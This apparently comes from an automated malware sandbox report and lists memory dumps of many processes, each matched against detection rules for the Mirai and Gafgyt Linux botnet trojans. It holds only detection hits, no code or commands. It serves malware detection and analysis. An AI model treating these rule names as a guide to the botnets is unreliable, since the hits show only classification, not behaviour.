Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6586.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6566.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6491.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6458.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6574.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6555.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6442.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6521.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6544.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6482.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
